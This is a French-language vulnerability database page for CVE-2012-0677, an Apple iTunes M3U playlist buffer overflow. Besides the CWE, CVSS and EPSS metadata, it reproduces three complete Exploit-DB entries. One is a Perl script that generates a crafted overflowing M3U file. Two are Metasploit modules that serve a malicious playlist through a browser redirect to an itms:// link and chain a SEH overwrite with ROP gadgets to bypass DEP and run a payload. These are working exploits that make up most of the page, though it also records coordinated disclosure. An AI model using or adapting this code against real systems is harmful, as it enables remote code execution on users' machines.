Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-119 |
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
9.3 |
|
AV:N/AC:M/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 19098
Date de publication : 2012-06-12 22h00 +00:00
Auteur : LiquidWorm
EDB Vérifié : Yes
#!/usr/bin/perl
#
#
# Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow
#
#
# Vendor: Apple Inc.
# Product web page: http://www.apple.com
# Affected version: 10.6.1.7 and 10.6.0.40
#
# Summary: iTunes is a free application for your Mac or PC. It lets you
# organize and play digital music and video on your computer. It can
# automatically download new music, app, and book purchases across all
# your devices and computers. And its a store that has everything you
# need to be entertained. Anywhere. Anytime.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a playlist file, which can be exploited to cause a heap based buffer
# overflow when a user opens e.g. a specially crafted .M3U file. Successful
# exploitation could allow execution of arbitrary code on the affected node.
#
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# (940.fc0): Access violation - code c0000005 (!!! second chance !!!)
# eax=41414141 ebx=08508cd8 ecx=41414141 edx=052a6528 esi=052a64b0 edi=0559ef20
# eip=41414141 esp=0012d8e8 ebp=7c90ff2d iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
# <Unloaded_Card.dll>+0x41414130:
# 41414141 ?? ???
#
# ~~~
#
# (6b0.a04): Access violation - code c0000005 (!!! second chance !!!)
# eax=41414141 ebx=00000000 ecx=00000014 edx=41414141 esi=41414141 edi=0187e10d
# eip=0187deec esp=0b0cfcd0 ebp=0b0cfcf0 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
# Defaulted to export symbols for C:\Program Files\Common Files\Apple\Apple Application Support\CoreFoundation.dll -
# CoreFoundation!CFWriteStreamCreateWithAllocatedBuffers+0x40:
# 0187deec 8b00 mov eax,dword ptr [eax] ds:0023:41414141=????????
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#
# Tested on: Microsoft Windows XP Professional SP3 EN (32bit)
# Microsoft Windows 7 Ultimate SP1 EN (64bit)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Vendor status:
#
# [13.03.2012] Vulnerability discovered in version 10.6.0.40.
# [29.03.2012] Vulnerability present in version 10.6.1.7.
# [11.05.2012] Vendor contacted.
# [11.05.2012] Vendor responds asking more details.
# [11.05.2012] Sent detailed information and PoC code to the vendor.
# [12.05.2012] Vendor begins investigation.
# [14.05.2012] Asked vendor for confirmation.
# [17.05.2012] Vendor confirms the vulnerability, developing patch.
# [17.05.2012] Requested a scheduled patch release date from vendor.
# [18.05.2012] Vendor replies.
# [06.06.2012] Asked vendor for status update.
# [08.06.2012] Vendor shares information about security update.
# [11.06.2012] Vendor releases version 10.6.3 to address this issue.
# [12.06.2012] Coordinated public security advisory released.
#
#
# Advisory ID: ZSL-2012-5093
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2012-5093.php
# Advisory TXT: http://www.zeroscience.mk/codes/itunes_bof.txt
#
# Apple ID: APPLE-SA-2012-06-11-1
# Apple Advisory #1: http://support.apple.com/kb/HT5318
# Apple Advisory #2: http://support.apple.com/kb/HT1222
#
# CVE ID: CVE-2012-0677
# CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0677
#
#
# 13.03.2012
#
use strict;
my $FILE = "HIEROGLYPH.m3u";
my $AN = "\x44\x44\x44\x44";
my $EGYPTIAN = "\x43" x 16560;
my $LIKE = "\x42\x42\x42\x42";
#######
#OOOOOOOOOOY
my $WALK="\x23\x45". "\x58\x54\x4D\x33".
"\x55\x0D\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41". "\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41". "\x41". "\x41\x41".
"\x41\x41\x41". "\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41\x41".
"\x41\x41\x41\x41". "\x41\x41\x41\x41".
"\x41\x41\x41".
"\x41\x41\x41".
"\x41\x41\x41".
"\x41\x41\x41\x41".
"\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41\x41". "\x41\x41\x41".
"\x41\x41\x41\x41". "\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41". "\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41" x 7691;
my $CRYPT = $WALK.$LIKE.$AN.$EGYPTIAN;
print "\n\n[+] Creating $FILE file...\n";
open ZSL, ">./$FILE" || die "\n[-] Can't open $FILE: $!\n\n";
print ZSL $CRYPT;
print "\n[+] File successfully composed!\n\n";
close ZSL;
Exploit Database EDB-ID : 19387
Date de publication : 2012-06-24 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple iTunes 10 Extended M3U Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7.
When opening an extended .m3u file containing an "#EXTINF:" tag description,
iTunes will copy the content after "#EXTINF:" without appropriate checking
from a heap buffer to a stack buffer, writing beyond the stack buffer's boundary,
which allows code execution under the context of the user.
Please note before using this exploit, you must have precise knowledge of the
victim machine's QuickTime version (if installed), and then select your target
accordingly.
In addition, even though this exploit can be used as remote, you should be aware
the victim's browser behavior when opening an itms link. For example,
IE/Firefox/Opera by default will ask the user for permission before launching the
itms link by iTunes. Chrome will ask for permission, but also spits a warning.
Safari would be an ideal target, because it will open the link without any
user interaction.
},
'Author' =>
[
'Rh0 <rh0[at]z1p.biz>', # discovery and metasploit module
'sinn3r' #Mo' targets & code cleanup, etc
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => ['win'],
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\xfc\xfb\xff\xff" # ADD ESP, -0x404
},
'References' =>
[
[ 'EDB', '19322' ]
],
'DisclosureDate' => "Jun 21 2012",
'Targets' =>
[
# Default package for iTunesSetup104.exe
['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3',
{
'Ret' => 0x669C197B, # ADD ESP,0xD40 / ret [QuickTime.qts]
'ROP_NOP' => 0x66801044 # RET
}
],
# Default package for iTunesSetup1041.exe
[ 'iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3',
{
'Ret' => 0x6693A96B, # ADD ESP,0xD40 / ret [QuickTime.qts]
'ROP_NOP' => 0x66801044 # RET
}
],
[ 'iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3',
{
'Ret' => 0x6693ACBB, # ADD ESP,0xD40 / ret [QuickTime.qts]
'ROP_NOP' => 0x66801044 # RET
}
],
['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3',
{
'Ret' => 0x6693afab, # ADD ESP,0xD40 / ret [QuickTime.qts]
'ROP_NOP' => 0x66801044 # RET
}
]
]
))
end
def on_request_uri(cli,request)
# re-generate the payload
return if ((p = regenerate_payload(cli).encoded) == nil)
host = request.headers['HOST']
agent = request.headers['USER-AGENT']
# iTunes browser link
m3u_location = "itms://#{host}#{get_resource()}/#{rand_text_alphanumeric(8+rand(8))}.m3u"
if request.uri =~ /\.ico$/i
# Discard requests for ico files
send_not_found(cli)
elsif request.uri =~ /\.m3u$/i
print_status("Target: #{target.name}")
print_status("Sending playlist")
send_response(cli, generate_m3u(p), { 'Content-Type' => 'audio/x-mpegurl' })
elsif agent =~ /MSIE (6|7|8)\.0/ and agent =~ /NT 5\.1/
print_status("Redirecting to playlist")
send_response(cli, generate_redirect_ie(m3u_location), { 'Content-Type' => 'text/html' })
elsif agent =~ /NT 5\.1/
# redirect Firefox, Chrome, Opera, Safari to iTunes link
print_status("Redirecting to playlist")
send_redirect(cli, m3u_location)
else
print_status("Unknown User-Agent: #{agent}")
send_not_found(cli)
end
end
# IE did not proper redirect when retrieving an itms:// location redirect via a HTTP header...
# ... so use html
def generate_redirect_ie(m3u_location)
ie_redir = <<-HTML_REDIR
<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="refresh" content="0; URL=#{m3u_location}">
</head>
</html>
HTML_REDIR
ie_redir = ie_redir.gsub(/^\t\t\t/, '')
return ie_redir
end
def generate_m3u(payload)
# Bypass stack cookies by triggering a SEH exception before
# the cookie gets checked. SafeSEH is bypassed by using a non
# safeSEH DLL [QuickTime.qts].
# stack buffer overflow ->
# overwrite SEH handler ->
# trigger SEH exception ->
# rewind stack (ADD ESP, ...) and land in ROP NOP sled ->
# virtualprotect and execute shellcode
m3u = '#EXTINF:,'
# stack layout depends on what iTunes is doing (running or not, playing music etc.) ...
# ... so ensure we overwrite a SEH handler to get back to our rop chain
m3u << [target.ret].pack("V") * 0x6a # stack pivot/rewind
m3u << [target['ROP_NOP']].pack("V") * 30 # ROP NOP sled
m3u << gimme_rop
m3u << payload
# 0x1000 should be enough to overflow the stack and trigger SEH
m3u << rand_text_alphanumeric(0x1000 - m3u.length)
return m3u
end
def gimme_rop
# thanx to mona.py :)
rop_chain = [
:popad,
# registers
0x66801044, # EDI: RET
0x7c801ad4, # ESI: VirtualProtect [kernel32.dll]
:jmpesp,
junk,
:ebx, # EBX: Becomes 0x3e8
0xffffffd6, # EDX: Becomes 0x40
0x673650b0, # ECX: lpflOldProtect
0x90909090, #EAX
# correct dwSize and flNewProtect
:modebx,
:addedx,
# throw it on the stack
:pushad
]
# Map gadgets to a specific Quicktime version
rop_chain.map! { |g|
case target.name
when /QuickTime 7\.69/
case g
when :popad then 0x66C3E260
when :jmpesp then 0x669F6E21
when :ebx then 0x4CC48017
when :modebx then 0x669A8648 # xor ebx,4CC483FF; ret
when :addedx then 0x669FC1C6 # add edx, 0x6a; ret
when :pushad then 0x6682A67E
else
g
end
when /QuickTime 7\.70/
case g
when :popad then 0x66926F5B
when :jmpesp then 0x66d6b743
when :ebx then 0x6c1703e8
when :modebx then 0x66b7d8cb # add ebx, 0x93E90000 ; ret
when :addedx then 0x66975556 # add edx, 0x6a; ret
when :pushad then 0x6689B829
else
g
end
when /QuickTime 7\.71/
case g
when :popad then 0x668E2BAA
when :jmpesp then 0x66965F78
when :ebx then 0x6c1703e8
when :modebx then 0x66B7DC4B # add ebx, 0x93E90000 ; ret
when :addedx then 0x66975956 # add edx, 0x6a; ret
when :pushad then 0x66C28B70
else
g
end
when /QuickTime 7\.72/
case g
when :popad then 0x66c9a6c0
when :jmpesp then 0x6697aa03
when :ebx then 0x6c1703e8
when :modebx then 0x66b7de1b # add ebx, 0x93E90000 ; ret
when :addedx then 0x66975c56 # add edx, 0x6a; ret
when :pushad then 0x6684b5c6
else
g
end
end
}
rop_chain.pack("V*")
end
def junk
rand_text_alpha(4).unpack("L")[0].to_i
end
end
=begin
0:000> r
eax=0e5eb6a0 ebx=00000000 ecx=00000183 edx=00000003 esi=0e5eb091 edi=00130000
eip=10ceaa7a esp=0012ee5c ebp=0012ee64 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
iTunes_10000000!iTunesMainEntryPoint+0xb93f3a:
10ceaa7a f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ee64 10356284 iTunes_10000000!iTunesMainEntryPoint+0xb93f3a
0012eea4 1035657c iTunes_10000000!iTunesMainEntryPoint+0x1ff744
0012eed8 1034de49 iTunes_10000000!iTunesMainEntryPoint+0x1ffa3c
00000000 00000000 iTunes_10000000!iTunesMainEntryPoint+0x1f7309
0:000> !address esi
0c720000 : 0d87d000 - 00ea3000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageHeap
Handle 0c720000
0:000> !address edi-10
00030000 : 000ee000 - 00042000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageStack
Pid.Tid d1c.d0c
=end
Exploit Database EDB-ID : 19322
Date de publication : 2012-06-20 22h00 +00:00
Auteur : Rh0
EDB Vérifié : Yes
##
#
# ============================================================================================
# * Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow Remote Code Execution (2012) *
# ============================================================================================
#
# Date: Jun 20 2012
# Author: Rh0
# Affected Versions: Apple iTunes 10.4.0.80 to 10.6.1.7
# Tested on: Windows XP Professional SP3 EN
#
# http://pastehtml.com/raw/c25uhk4ab.html
#
# ============================================================================================
#
# This seems not to be CVE-2012-0677 as this here is stack based. However it was also fixed
# by Apple without mentioning it in the security fixes http://support.apple.com/kb/HT5318
# of iTunes 10.6.3.25
#
#
# - written for educational purposes -
#
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
# e.g.: put this module into modules/exploit/windows/browser/itunes_extm3u_bof.rb
def initialize(info = {})
super(update_info(info,
'Name' => 'iTunes Extended M3U Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7.
When opening an extended .m3u file containing an "#EXTINF:" tag description,
iTunes will copy the content after "#EXTINF:" without appropriate checking
from a heap buffer to a stack buffer and write beyond the stack buffers boundary.
This allows arbitrary code execution.
The Windows XP target has to have QuickTime 7.7.2 installed for this module
to work. It uses a ROP chain from a non safeSEH enabled DLL to bypass DEP and
safeSEH. The stack cookie check is bypassed by triggering a SEH exception.
},
## NOTE ##
# Exploit works best if iTunes is not running and the user browses to a malicious page.
# But even if iTunes is already running and playing music, the exploit worked reliably
#
# remote code execution is possible via itms:// handler, which instructs a browser to open
# iTunes:
# Safari does not prompt for iTunes itms links -> RCE without user interaction
# Firefox, Opera, and IE ask the user for permission to launch iTunes
# Chrome asks for permission and spits a big warning
'Author' =>
[
'Rh0 <rh0 [at] z1p.biz>' # discovery and metasploit module
],
'Version' => '0.0',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => ['win'],
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\xfc\xfb\xff\xff" # ADD ESP, -0x404
},
'Targets' =>
[
['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.7.2 - Windows XP SP3 EN Professional',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
'SEH' => 0x6693afab, # ADD ESP,0xD40 / ret [QuickTime.qts v7.7.2]
'ROP_NOP' => 0x66801044 # RET
}
]
],
'DefaultTarget' => 0
))
register_options(
[
OptPort.new('SRVPORT', [true, "The local port to listen on", 80]),
OptString.new('URIPATH', [false, "The URI to use for this exploit", "/"]),
],
self.class
)
end
def on_request_uri(cli,request)
# re-generate the payload
return if ((p = regenerate_payload(cli).encoded) == nil)
host = request.headers['HOST']
agent = request.headers['USER-AGENT']
# iTunes browser link
m3u_location = "itms://#{host}/#{rand_text_alphanumeric(8+rand(8))}.m3u"
if request.uri =~ /\.ico$/i
# Discard requests for ico files
send_not_found(cli)
#elsif agent =~ /iTunes\/10.6.1/ and agent =~ /Windows XP Professional Service Pack 3/ and request.uri =~ /\.m3u$/i
elsif agent =~ /iTunes/ and agent =~ /Windows XP Professional Service Pack 3/ and request.uri =~ /\.m3u$/i
# exploit iTunes (<= 10.6.1.7) on Windows XP SP3
send_response(cli, generate_m3u(p), { 'Content-Type' => 'audio/x-mpegurl' })
status(request,cli,"Sending playlist")
elsif agent =~ /MSIE (6|7|8)\.0/ and agent =~ /NT 5\.1/
# redirect MSIE to iTunes link
send_response(cli, generate_redirect_ie(m3u_location), { 'Content-Type' => 'text/html' })
status(request,cli,"Redirecting to playlist")
elsif agent =~ /NT 5\.1/
# redirect Firefox, Chrome, Opera, Safari to iTunes link
send_redirect(cli, m3u_location)
status(request,cli,"Redirecting to playlist")
else
send_not_found(cli)
print_status("Unknown User-Agent. Sending 404")
end
end
# IE did not proper redirect when retrieving an itms:// location redirect via a HTTP header...
# ... so use html
def generate_redirect_ie(m3u_location)
ie_redir = <<-HTML_REDIR
<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="refresh" content="0; URL=#{m3u_location}">
</head>
</html>
HTML_REDIR
return ie_redir
end
# create the malicious playlist
def generate_m3u(payload)
# Bypass stack cookies by triggering a SEH exception before
# the cookie gets checked. SafeSEH is bypassed by using a non
# safeSEH DLL [QuickTime.qts v7.7.2]. DEP is bypassed by using ROP.
# stack buffer overflow ->
# overwrite SEH handler ->
# trigger SEH exception ->
# rewind stack (ADD ESP, ...) and land in ROP NOP sled ->
# virtualprotect and execute shellcode
target = targets[0]
m3u = '#EXTINF:,'
# stack layout depends on what iTunes is doing (running or not, playing music etc.) ...
# ... so ensure we overwrite a SEH handler to get back to our rop chain
m3u << [target['SEH']].pack("V") * 0x6a # stack pivot/rewind
m3u << [target['ROP_NOP']].pack("V") * 30 # ROP NOP sled
m3u << gimme_rop
m3u << payload
# 0x1000 should be enough to overflow the stack and trigger SEH
m3u << rand_text_alphanumeric(0x1000 - m3u.length)
return m3u
end
def gimme_rop()
# thanx to mona.py :)
rop_chain = [
0x66c9a6c0, # POPAD / RET
# registers
0x66801044, # EDI: RET
0x7c801ad4, # ESI: VirtualProtect [kernel32.dll]
0x6697aa03, # EBP: JMP ESP
junk, # skipped
0x6c1703e8, # EBX: will become 0x3e8 after adding 0x93e90000 (dwSize)
0xffffffd6, # EDX: will become 0x40 after adding 0x6a (flNewProtect)
0x673650b0, # ECX: lpflOldProtect
0x90909090, # EAX: nops
# correct dwSize and flNewProtect
0x66b7de1b, # ADD EBX, 0x93E90000 / RET
0x66975c56, # ADD EDX, 0x6A / RET
# throw it on the stack
0x6684b5c6 # PUSHAD / RET
].pack("V*")
return rop_chain
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def status(req,cli,action)
print_status("Request for #{req.uri} from #{cli.peerhost}:#{cli.peerport}. #{action}")
end
end
Products Mentioned
Configuraton 0
Apple>>Itunes >> Version To (including) 10.6.1
Apple>>Itunes >> Version 10.0
Apple>>Itunes >> Version 10.0.1
Apple>>Itunes >> Version 10.1
Apple>>Itunes >> Version 10.1.1
Apple>>Itunes >> Version 10.1.1.4
Apple>>Itunes >> Version 10.1.2
Apple>>Itunes >> Version 10.2
Apple>>Itunes >> Version 10.2.2.12
Apple>>Itunes >> Version 10.3
Apple>>Itunes >> Version 10.3.1
Apple>>Itunes >> Version 10.4
Apple>>Itunes >> Version 10.4.0.80
Apple>>Itunes >> Version 10.4.1
Apple>>Itunes >> Version 10.4.1.10
Apple>>Itunes >> Version 10.5
Apple>>Itunes >> Version 10.5.1
Apple>>Itunes >> Version 10.5.1.42
Apple>>Itunes >> Version 10.5.2
Apple>>Itunes >> Version 10.5.3
Apple>>Itunes >> Version 10.6
Références